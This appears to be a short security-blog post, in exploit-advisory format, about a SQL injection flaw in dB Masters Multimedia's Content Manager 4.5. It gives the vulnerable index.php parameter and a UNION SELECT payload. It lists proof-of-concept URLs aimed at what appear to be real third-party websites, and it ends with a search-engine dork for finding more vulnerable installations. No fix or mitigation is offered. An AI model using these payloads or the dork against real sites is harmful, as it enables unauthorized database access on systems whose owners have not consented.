dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln


[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability
Software : dB Masters Multimedia's Content Manager version 4.5
Vendor   : http://www.dbmasters.net/
Author   : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?n=xx&id=[SQL]


[o] Proof of Concept
http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--


[o] Dork
"Powered by dB Masters Multimedia's Content Manager"

Research Blog

Search This Blog

LFI to RCE via access_log injection

dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln

Comments